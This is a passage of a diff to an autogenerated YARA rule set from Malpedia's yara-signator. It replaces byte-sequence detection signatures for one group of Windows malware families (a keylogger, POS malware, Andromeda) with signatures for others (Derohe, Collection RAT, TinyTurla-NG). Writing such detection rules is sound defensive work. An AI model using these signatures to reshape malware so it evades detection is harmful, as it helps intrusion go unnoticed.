+		$sequence_5 = { 7747 e8???????? 660f6f05???????? f30f7f4527 c6451700 807de700 7409 }
+		$sequence_6 = { 0f45fd 488bce e8???????? 488b4c2430 e8???????? }
+		$sequence_7 = { 488d4c2460 ffd2 90 e9???????? 0f57c0 0f1145f0 0f57c9 }
+		$sequence_8 = { e8???????? 4c8b4c2450 4c8bc3 488bd7 488bce }
+		$sequence_9 = { 488b49f8 482bc1 4883c0f8 4883f81f 0f87d8000000 e8???????? 483bfe }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 413696
 }
-rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
+rule MALPEDIA_Win_Derohe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96f37009-369b-5f17-a68b-4eb5c0d4026d"
+		id = "4840f450-01b9-530f-9f3a-ae1edecbe97a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keylogger_apt3_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.derohe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "023590d599979615d817aedf4414560e8504e62badef12c9dd3c7d358dc03318"
+		logic_hash = "d33bdd1d4e902dd1e401bdb13051180ed9ff9ef53abcf198b2156206eaf60cc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90992,32 +91132,32 @@ rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 8b4e08 6a08 51 ffd7 }
-		$sequence_1 = { 8b9c2430040000 55 8bac2430040000 56 57 8bbc2434040000 6800010000 }
-		$sequence_2 = { 52 ffd7 8b0d???????? 8d442424 50 51 }
-		$sequence_3 = { 8d45f0 50 e8???????? cc e8???????? 8b4004 c3 }
-		$sequence_4 = { e8???????? 55 e8???????? 68???????? e8???????? 8b8c2440020000 83c40c }
-		$sequence_5 = { 52 ffd7 a1???????? 896844 8b9eac010000 85db 742e }
-		$sequence_6 = { 52 e8???????? 8d862c020000 50 8d4c242c 68???????? 51 }
-		$sequence_7 = { 8d7c00ff 3bc7 89442418 0f8dc6000000 8b542414 8bd8 69db14010000 }
-		$sequence_8 = { 68???????? 52 ffd7 8b0d???????? 8d442438 50 }
-		$sequence_9 = { e8???????? 83c404 8b442414 6a00 6a00 6a10 8d54244c }
+		$sequence_0 = { ffd0 8b542404 c6042443 8b02 ffd0 8b542404 c60424c9 }
+		$sequence_1 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424b7 }
+		$sequence_2 = { e8???????? 5a 85c0 0f846b050000 8b742428 31c0 8b1f }
+		$sequence_3 = { ffd0 8b542404 c60424fe 8b02 ffd0 8b542404 c6042424 }
+		$sequence_4 = { ffd0 8b542404 c60424d4 8b02 ffd0 8b542404 c6042464 }
+		$sequence_5 = { ffd0 8b542404 c60424ae 8b02 ffd0 8b542404 c6042435 }
+		$sequence_6 = { ff702c ff15???????? 0fb7431c 897318 83e00a 83c410 6683f80a }
+		$sequence_7 = { ffd0 8b542404 c604245f 8b02 ffd0 8b542404 c60424f5 }
+		$sequence_8 = { ffd0 8b542404 c60424ba 8b02 ffd0 8b542404 c60424c5 }
+		$sequence_9 = { e8???????? 8b542414 8b4318 2982d4000000 8b4718 89c1 81e110900000 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 35788800
 }
-rule MALPEDIA_Win_Scarabey_Auto : FILE
+rule MALPEDIA_Win_Collection_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "df55f2c4-936e-5089-bf63-ab8881b2ccec"
+		id = "ee99e95c-7900-562e-8613-68183d72bbe0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scarabey_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.collection_rat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ab0b8e9df053b2dde174abe1928026d6e032765d40449a0cf5be9cf6e0235b67"
+		logic_hash = "4a525a556c647435c47597aca6c93f4c0c1ae69ffb1c4982506b53b4f472dc0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91031,71 +91171,71 @@ rule MALPEDIA_Win_Scarabey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 ff5004 899e58030000 e9???????? c78778010000acab5700 }
-		$sequence_1 = { 51 50 8d45c0 50 ffd7 897598 c74594fc2f5300 }
-		$sequence_2 = { 51 ff15???????? 8d8dc0d6ffff e8???????? 8b95c0d6ffff 52 }
-		$sequence_3 = { 8b442408 8b4c2404 6a00 6a00 6a00 6a00 50 }
-		$sequence_4 = { ff15???????? 6a01 8d8d14d1ffff 51 ff15???????? 6a00 6a00 }
-		$sequence_5 = { 894608 89460c c706???????? c74604???????? c74610541e5300 e8???????? 8bc6 }
-		$sequence_6 = { e9???????? 837dec00 0f851a010000 6683f80c 0f8510010000 6a0a }
-		$sequence_7 = { 8bf0 83f907 7771 ff248d690c4700 4e eb26 }
-		$sequence_8 = { c745bc06000000 897dd0 c745c404885300 c745cc64000000 ff9060010000 }
-		$sequence_9 = { c745cc18405300 e8???????? 33c0 40 e8???????? c20400 6a08 }
+		$sequence_0 = { 4885d2 740b 41b001 488bce e8???????? e8???????? }
+		$sequence_1 = { 8d7e78 448bc3 8bd7 e8???????? 448bce 4c8d442440 8d5601 }
+		$sequence_2 = { 488bce e8???????? e8???????? 488bc8 baa3000000 e8???????? 488b8f80000000 }
+		$sequence_3 = { bf18000000 448bc7 33d2 488d8c24a8000000 e8???????? 89bc24a8000000 c78424b800000001000000 }
+		$sequence_4 = { 410fb7cc eb4a 80f92b 7507 b93e000000 eb3e }
+		$sequence_5 = { e8???????? eb27 488b5950 e8???????? 488bc8 ba98000000 e8???????? }
+		$sequence_6 = { c3 418bc4 ebdc 4885d2 0f84aa020000 48895c2408 57 }
+		$sequence_7 = { 488b4c2470 e8???????? eb14 89442420 4533c9 4533c0 }
+		$sequence_8 = { 4183e801 7429 4183e801 741e 4183e801 740f 4183f801 }
+		$sequence_9 = { 4883ec20 4c8b7150 488bd9 b900100000 }
 
 	condition:
-		7 of them and filesize < 3580928
+		7 of them and filesize < 397312
 }
-rule MALPEDIA_Win_Xfscashncr_Auto : FILE
+rule MALPEDIA_Win_C0D0So0_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "08fa1629-5d24-53b4-85f4-eb31463ca09f"
+		id = "aea7e5c4-8703-5b4f-a55a-e1b218098e9e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xfscashncr_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.c0d0so0_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "6e03028d0cfd23b56ac82a98bfd4131d910eac7c39a1c7a0b0fafa796b30a166"
+		logic_hash = "0dd75833152df4b63946cc86c2ac389a4374b8155ffb49a46f2ef69869ec191b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 741b 0fbe4d82 85c9 7413 8b4d10 e8???????? 0fbe10 }
-		$sequence_1 = { 8b4d18 e8???????? 8b8564ffffff 50 0fb64d1c 51 8b5514 }
-		$sequence_2 = { c1f805 8b4de0 83e11f c1e106 030c85c0195700 894de4 8b55e4 }
-		$sequence_3 = { 8d450c 50 e8???????? 83c408 0fb6c8 85c9 742a }
-		$sequence_4 = { 004fed 4e 0015???????? ed 4e 0000 0501050205 }
-		$sequence_5 = { 8955f4 8b450c 8b4d18 8d14c1 8955f8 8b4508 50 }
-		$sequence_6 = { 8b45d0 8b0c85c0195700 81c100080000 394de4 7366 8b55e4 c6420400 }
-		$sequence_7 = { d1f8 b902000000 c1e100 8b5508 0fb70c0a c1e10f 0bc1 }
-		$sequence_8 = { 8b55fc 0fb7040a 85c0 752f b902000000 c1e100 8b55fc }
-		$sequence_9 = { 0fb755a4 52 6a01 8b4524 50 8d4dd4 e8???????? }
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 6a04 bf00200000 57 ff7350 ff7334 ffd6 }
+		$sequence_1 = { 837d0c00 7404 0006 eb02 2806 0fb6c0 }
+		$sequence_2 = { ff15???????? eb46 8d0c4e 8d0c4f }
+		$sequence_3 = { ff15???????? 85c0 7423 6683780802 }
+		$sequence_4 = { 33c0 5d c3 8b503c 813c1050450000 75f0 8bd7 }
+		$sequence_5 = { 7421 8345f814 8b45f8 6a14 83c0f0 50 }
+		$sequence_6 = { c1ea10 ff4dfc 8813 43 837dfc00 7fe7 8b5508 }
+		$sequence_7 = { 741f 4a 7417 4a 740f }
+		$sequence_8 = { eb62 8d45f4 50 57 8d45fc }
+		$sequence_9 = { 85c0 740f 8b00 47 89048e 41 }
 
 	condition:
-		7 of them and filesize < 3126272
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Aukill_Auto : FILE
+rule MALPEDIA_Win_Jimmy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "efca2687-336d-54b6-b9e5-6006cad01a63"
+		id = "571698ec-d0cc-5f2f-93fe-935369535da3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aukill_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jimmy_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "5efb284cf60297ddb14dee519095e9a3fbc8f6f4ea4b889dc99b33d704551ec0"
+		logic_hash = "4dcefc186990b0fab3b8fbf45f928a3141684ff216c800369029d79b753cf37a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91109,32 +91249,32 @@ rule MALPEDIA_Win_Aukill_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 b940040000 ff15???????? 488bd8 }
-		$sequence_1 = { 488b442460 4c8d442430 488b4c2458 33d2 4889442434 }
-		$sequence_2 = { 48894c2430 ba04003583 894c2428 48894c2420 448d4920 48894c2450 488b0d???????? }
-		$sequence_3 = { 771c 488b0b ff15???????? 0fb608 }
-		$sequence_4 = { 33c9 48895c2440 48894c2438 4c8d442440 48894c2430 ba04003583 }
-		$sequence_5 = { 488b442460 4c8d442430 488b4c2458 33d2 }
-		$sequence_6 = { 48894c2420 448d4920 48894c2450 488b0d???????? }
-		$sequence_7 = { 448d4920 48894c2450 488b0d???????? 48897c2458 4889442448 }
-		$sequence_8 = { ff15???????? 85c0 751d 488bcb ff15???????? ff15???????? }
-		$sequence_9 = { 8905???????? c705????????02000000 48c705????????04000000 ff15???????? 488905???????? 4885c0 }
+		$sequence_0 = { 50 e8???????? 83c40c 85c0 7460 e8???????? }
+		$sequence_1 = { 32c0 eb6f 8b45e8 2b45f0 }
+		$sequence_2 = { e8???????? 59 668945f2 ff750c e8???????? 59 }
+		$sequence_3 = { 8b4dec 0fbe09 3bc1 755b }
+		$sequence_4 = { c745fc12030900 e9???????? 837de805 752c ff75e4 }
+		$sequence_5 = { 81ec40020000 c685cbfdffff01 6a00 6a02 e8???????? }
+		$sequence_6 = { 8d840004010000 50 e8???????? 59 89856cfeffff ff7508 }
+		$sequence_7 = { eb12 8b45f8 c6805001000001 33c0 0f855effffff 8b45f8 c9 }
+		$sequence_8 = { 59 59 ff75f4 e8???????? 59 ff75f8 }
+		$sequence_9 = { 8b45f8 8945f4 8b450c 8945fc }
 
 	condition:
-		7 of them and filesize < 446464
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
+rule MALPEDIA_Win_Mqsttang_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "618065dd-9f8b-57c5-a1c0-0e96b509ca5a"
+		id = "0fcd67af-429a-5d69-a3b0-3220fad637de"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.abaddon_pos_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mqsttang_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6a0d0d67cac52b36a9cdcb672d29dd1257357954e73ab46b05405f9db5dca5b4"
+		logic_hash = "11a5ef4fb125e32dd68c79670f73b1f4916ce31a149e2ff34e91c4e49e4be013"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91148,39 +91288,34 @@ rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750a 83fb3c 7605 e9???????? }
-		$sequence_1 = { 7605 e9???????? 48 034510 48 0500040000 803800 }
-		$sequence_2 = { 43 8b86ac010000 b400 b20a f6f2 80fc00 7406 }
-		$sequence_3 = { 8945fc 83f800 7502 eb86 6800d00700 ff75ec }
-		$sequence_4 = { eb91 81be0c01000080cf0700 7607 bb80cf0700 eb06 8b9e0c010000 }
-		$sequence_5 = { 48 89c7 48 8d86b8010000 48 }
-		$sequence_6 = { 6a00 6a02 ff15???????? 8945e8 8d95c0feffff 52 }
-		$sequence_7 = { 81c3f8030000 8903 48 31db 48 8b96d0050000 }
-		$sequence_8 = { 31c0 48 31d2 8a841eb8010000 }
-		$sequence_9 = { ff15???????? 8b86a0010000 3b86a4010000 0f83e6030000 8b9e94010000 039ea0010000 803b33 }
-		$sequence_10 = { 83f809 7603 83e809 ba00000000 eb05 ba01000000 0186ac010000 }
-		$sequence_11 = { 80fd3e 7406 41 80fd3f 756e 49 }
-		$sequence_12 = { 89e5 48 83ec20 48 c7c100000000 }
-		$sequence_13 = { 2c30 80ea30 666bc00a 48 01d0 48 89da }
-		$sequence_14 = { 52 ffb558feffff ff15???????? 8d9530fdffff 52 }
+		$sequence_0 = { ebd4 ebf3 8d4dcc 89c3 e8???????? ebc6 ebe5 }
+		$sequence_1 = { f20f105dd8 f20f1065e0 f20f115db8 f20f1165b0 0f87a9000000 890c24 89d9 }
+		$sequence_2 = { ebec 8b95e4baffff 29ca 83fa02 0f8e87f7ffff 668b4004 6683f83d }
+		$sequence_3 = { eb0f f6c220 7413 8365081f 837d0801 7420 43 }
+		$sequence_4 = { ff15???????? 891c24 89442404 89c6 c745d402000000 c745d800000000 c745dc00000000 }
+		$sequence_5 = { eb16 8b5604 83c301 8b4208 8b4a0c 29c1 39d9 }
+		$sequence_6 = { f0832a01 742b 8b542420 8b0a 85c9 7451 83f9ff }
+		$sequence_7 = { f0832801 0f84231b0000 8b4588 8b4010 8b10 85d2 0f84f01a0000 }
+		$sequence_8 = { c7042400000000 b903000000 ba21000000 89d8 e8???????? 85c0 0f84db000000 }
+		$sequence_9 = { e8???????? 8985bcfeffff e9???????? 8b4508 8b95fcfeffff 8b4874 8b85f8feffff }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 12651520
 }
-rule MALPEDIA_Win_Andromeda_Auto : FILE
+rule MALPEDIA_Win_Evilpony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aedaa52d-9d6c-5053-8164-d65674aef5c3"
+		id = "ac551db8-0573-5b4c-8b60-da95879223db"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andromeda_auto.yar#L1-L305"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilpony_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "20401b03708a6c3a0bc1e9efb5c1e1d85a9de75bca8501a792bc92bf7f214fb5"
+		logic_hash = "0bf858d26f7e4c261dccce71f7e0ab87c5f711b7c43013273d044a5073bd8d2b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91192,54 +91327,32 @@ rule MALPEDIA_Win_Andromeda_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 02d6 81e2ff000000 368a942a00ffffff 301439 41 }
-		$sequence_1 = { 8b7508 33db 368a942900ffffff 02c2 }
-		$sequence_2 = { 7408 43 3b5d0c 74cf ebcf 33c0 }
-		$sequence_3 = { 55 8bec 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff }
-		$sequence_4 = { fec0 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff 3688942b00ffffff 02d6 }
-		$sequence_5 = { e2f8 fc 33c0 8b7508 }
-		$sequence_6 = { 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 }
-		$sequence_7 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 }
-		$sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 }
-		$sequence_9 = { 0fb64601 84c0 7905 0d00ffffff }
-		$sequence_10 = { 0f9ec1 33d2 3c41 0f9dc2 85ca 7404 0420 }
-		$sequence_11 = { 8a06 33c9 3c5a 0f9ec1 33d2 3c41 }
-		$sequence_12 = { 8d45d0 50 6a01 ff7508 }
-		$sequence_13 = { 50 e8???????? 83c40c 6800000100 e8???????? }
-		$sequence_14 = { 68???????? 50 ff15???????? 83c40c 56 6880000000 }
-		$sequence_15 = { 689f010000 6811010000 57 68???????? ff15???????? 50 }
-		$sequence_16 = { 68401f0000 e8???????? 668945e2 c745e400000000 }
-		$sequence_17 = { c745e400000000 6a00 6a00 6a00 6a06 6a01 6a02 }
-		$sequence_18 = { c7459c44000000 8945d4 8945d8 8945dc 66c745cc0000 c745c801010000 8d458c }
-		$sequence_19 = { 7457 33c0 8d7d9c b944000000 f3aa 6a00 6a00 }
-		$sequence_20 = { e8???????? ff75f4 e8???????? 68???????? 6801010000 e8???????? }
-		$sequence_21 = { 6a02 e8???????? 8945f0 83f8ff 7479 }
-		$sequence_22 = { e8???????? 8945f8 83f800 0f8458010000 }
-		$sequence_23 = { 6804010000 ff75fc 6a00 e8???????? 6a00 ff75f8 }
-		$sequence_24 = { 81fb5267a723 0f843fffffff 56 ff7514 }
-		$sequence_25 = { 0faff8 69f677adcc8a 81ffd02eaced 0f84a1feffff e9???????? 803beb }
-		$sequence_26 = { 81e604002402 81e747af3c96 81ce00008000 81c760345938 }
-		$sequence_27 = { 8b4574 833800 0f846c010000 6af5 ff5510 }
-		$sequence_28 = { ff5614 8bd8 81f392be3437 81ff64e62722 0f8418010000 8365f000 6850020000 }
-		$sequence_29 = { ff5638 314508 ff560c 8b7d04 0bd8 81fbb599839e 7503 }
-		$sequence_30 = { 81f99cd8b976 7417 85db 7c73 }
-		$sequence_31 = { ff5518 33f8 81f6acec75ce 81ff45ee1de6 0f84ce000000 837d4800 }
+		$sequence_0 = { ff74242c ff750c 53 e8???????? 83c418 85c0 7488 }
+		$sequence_1 = { 8d442420 50 ff742420 897c242c bbff070000 57 eb50 }
+		$sequence_2 = { 897df8 397df4 7654 3bf7 7450 8b4668 6aff }
+		$sequence_3 = { ff15???????? 8bd8 85db 747c 8bc6 }
+		$sequence_4 = { 837c241c05 750b 53 e8???????? 59 89442428 }
+		$sequence_5 = { ff75fc 8bf8 ff15???????? 85c0 7411 56 57 }
+		$sequence_6 = { 8d55b8 52 6a10 897dfc 8b08 50 ff510c }
+		$sequence_7 = { 50 ffd6 83c410 8d8564ffffff 50 ffb500ffffff ffd7 }
+		$sequence_8 = { 85c0 0f8485000000 8365f400 eb06 8b5d08 8b450c 8b0b }
+		$sequence_9 = { 33c5 8945f8 8b450c 8985f0f7ffff }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Grimplant_Auto : FILE
+rule MALPEDIA_Win_Jasus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4355e5f-8d8e-5a41-aaf8-ff78dc5bf245"
+		id = "4b02d02a-6c2f-5b7d-a1b9-9adc3f6ec692"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grimplant_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jasus_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "4dec16f667070add3c068beb4323237f7a05d78d34df766eafa3cbe4813f7400"
+		logic_hash = "b14ad9069299f53695d1925d28e19a4f9144d4135d3ef376cb647d76db2503c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91253,32 +91366,32 @@ rule MALPEDIA_Win_Grimplant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb13 4889c3 4889f0 e8???????? 488b942480000000 84c0 742a }
-		$sequence_1 = { eb09 488d7908 e8???????? 488b6c2420 4883c428 c3 0f1f4000 }
-		$sequence_2 = { e8???????? 488d056e852500 488b5c2428 488b4c2448 488b7c2450 e8???????? 48c7400801000000 }
-		$sequence_3 = { e8???????? 4889d8 e8???????? 4c89e0 0f1f440000 e8???????? 488b9424f8000000 }
-		$sequence_4 = { 4c8b442458 4c8b4c2460 4c8d15f1213300 4989c3 4889c8 4889d1 488bac24a0000000 }
-		$sequence_5 = { eb1c 488b4c2460 488b8908010000 488b442468 ffd1 3c03 7505 }
-		$sequence_6 = { 8400 833d????????00 750c 488d0da5553c00 488908 eb0f 4889c7 }
-		$sequence_7 = { c3 4889d0 488b5c2468 488b4c2440 488d3dd7323800 be04000000 e8???????? }
-		$sequence_8 = { bf01000000 4889fe e8???????? 0f1f440000 e8???????? 4889c3 488d05f1d22a00 }
-		$sequence_9 = { ffd2 488d48ff eb15 31c0 488b6c2468 4883c470 c3 }
+		$sequence_0 = { 663915???????? 0f8730020000 663915???????? 0f8723020000 663915???????? 0f8716020000 663915???????? }
+		$sequence_1 = { 740f 50 68???????? 56 e8???????? 83c40c 8b45f0 }
+		$sequence_2 = { e8???????? 8b54241c 8bf0 80bb8000000000 c6432d00 7412 }
+		$sequence_3 = { 8bcb 2b4e14 2bc2 3bc8 744e 8b4df8 85c9 }
+		$sequence_4 = { 8d7b1e e8???????? 84c0 7437 a1???????? 8b55f8 }
+		$sequence_5 = { c3 56 33f6 85db 0f889d000000 57 8bf8 }
+		$sequence_6 = { 7474 833b00 756f f644242c01 668954242e 750a }
+		$sequence_7 = { 8b8534feffff 668955c4 8b958cfeffff 6a02 }
+		$sequence_8 = { c1f905 8b0c8d809d4300 c1e006 8d440104 800820 8b4df4 b8000000c0 }
+		$sequence_9 = { 68???????? e8???????? 8b8df8feffff 83c448 51 ff15???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 19940352
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Statc_Auto : FILE
+rule MALPEDIA_Win_Tinyturla_Ng_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "808b480a-a4a8-5b96-a652-004f7a1eca10"
+		id = "237c3b29-3ffe-58e0-8377-deec3f9ada49"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.statc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.statc_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyturla_ng"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyturla_ng_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "d41663c5e21054ad8e54e8097dd90a58bbd0b9def413c1922ece24784d1402b9"
+		logic_hash = "053b5083da44c3f040d79aabaeaa3be9af43dd91f5cebec175c4332c307fa8d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91292,32 +91405,32 @@ rule MALPEDIA_Win_Statc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7409 8984248c000000 ebc5 488d942488000000 488bcf e8???????? }
-		$sequence_1 = { c6040129 e9???????? 4d8b4010 488d15c9dd2700 488d4def 4d8b00 e8???????? }
-		$sequence_2 = { 7f1d 8b8424e0000000 448bca ba69000000 89442420 488bcb e8???????? }
-		$sequence_3 = { b807000000 8bc8 894344 488bcb 8bd0 e8???????? e9???????? }
-		$sequence_4 = { e9???????? 488d8ab8010000 e9???????? 488d8ad0000000 e9???????? 488d8a90000000 e9???????? }
-		$sequence_5 = { c645d01c c745d401000000 488975e0 48894598 488d4d90 488b4580 4533e4 }
-		$sequence_6 = { e8???????? 488bcf e8???????? 48c70300000000 4d85ed 7409 498bcd }
-		$sequence_7 = { 48f7e2 488bf2 48c1ee04 48ffc6 0fbe43f1 84c0 740d }
-		$sequence_8 = { e8???????? 8bf8 896c2450 3b44243c 7413 488d15da212800 488bce }
-		$sequence_9 = { ff15???????? 488b4b18 33c0 48898318020000 48898320020000 898328020000 898378020000 }
+		$sequence_0 = { 4881ec90000000 488b05???????? 4833c4 4889451f 488bda 488bf1 }
+		$sequence_1 = { 488bcf e8???????? 33c9 eb15 }
+		$sequence_2 = { 488d7027 4883e6e0 488946f8 eb36 b816000000 483bf8 480f42f8 }
+		$sequence_3 = { c60600 8b87b8020000 8987b4020000 8b8fb4020000 ff15???????? 80bfcc02000000 0f8579fdffff }
+		$sequence_4 = { 85c0 0f8572010000 488b4d0f 488d45ff 41b901000000 4889442420 4533c0 }
+		$sequence_5 = { 4863f0 ff15???????? 488bc8 4c8d4601 33d2 ff15???????? 488bd8 }
+		$sequence_6 = { 8b4558 83e001 85c0 7414 836558fe 488b4d60 }
+		$sequence_7 = { 488b4d0f 488d45ff 41b901000000 4889442420 4533c0 488d5517 ff15???????? }
+		$sequence_8 = { 803c0800 75f7 488d5550 48c7c0ffffffff 48ffc0 }
+		$sequence_9 = { 4c8d050f92ffff 33d2 33c9 e8???????? }
 
 	condition:
-		7 of them and filesize < 6429696
+		7 of them and filesize < 635904
 }
-rule MALPEDIA_Win_Halfrig_Auto : FILE
+rule MALPEDIA_Win_Mongall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42e8a2a1-259b-540e-bb50-a68bd513fd92"
+		id = "084e4b5d-8f53-5615-8d00-9dc87d5afd58"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig"
